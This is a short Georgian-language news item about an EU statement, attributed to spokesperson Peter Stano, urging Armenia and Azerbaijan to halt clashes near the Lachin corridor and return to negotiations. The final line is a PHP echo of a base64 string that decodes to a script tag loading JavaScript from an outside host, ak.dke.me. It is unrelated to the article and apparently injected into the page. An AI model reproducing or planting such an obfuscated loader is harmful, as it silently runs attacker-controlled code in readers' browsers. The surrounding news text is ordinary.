celsiusi
ავერსი საქკაბელი
სომხეთსა და აზერბაიჯანს შორის საბრძოლო მოქმედებების განახლებასთან დაკავშირებით, ევროკავშირის საგარეო ქმედებათა სამსახურის პრესცენტრი განცხადებას აქვეყნებს.
 
როგორც განცხადებაშია აღნიშნული, ევროკავშირი აზერბაიჯანულ და სომხურ ძალებს საომარი მოქმედებების დაუყოვნებლივ შეწყვეტისკენ მოუწოდებს.
 
ევროკავშირი აცხადებს, რომ გადაწყვეტილების მოსაძებნად აუცილებელია მოლაპარაკებების მაგიდასთან დაბრუნება.
 
„ევროკავშირი საომარი მოქმედებების დაუყოვნებლივ შეწყვეტისკენ მოუწოდებს, რომელიც აზერბაიჯანულ და სომხურ ძალებს შორის ლაჩინის დერეფნის გარშემო და კონტაქტის ხაზის გასწვრივ, სხვა ადგილებში დაიწყო. სამწუხაროდ, ამ შეტაკებებს უკვე მოჰყვა მსხვერპლი და არიან დაშავებულები.
 
აუცილებელია დეესკალაცია, ცეცხლის შეწყვეტის სრული დაცვა და მოლაპარაკების მაგიდასთან დაბრუნება, მოლაპარაკების გზით გადაწყვეტილებების მოსაძებნად.
 
ევროკავშირი რჩება ერთგული, დაეხმაროს დაძაბულობის დაძლევაში და განაგრძოს ჩართულობა სამხრეთ კავკასიაში მდგრადი მშვიდობისა და სტაბილურობისთვის“, – აღნიშნულია ევროკავშირის საგარეო სამსახურის პრესსპიკერ პიტერ სტანოს განცხადებაში.
 
დღეს მედიაში გავრცელდა ინფორმაცია, რომ მთიან ყარაბაღში აზერბაიჯანისა და სომხეთის სამხედრო ნაწილებს შორის შეტაკებები მიმდინარეობს და არის მსხვერპლი.
467
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");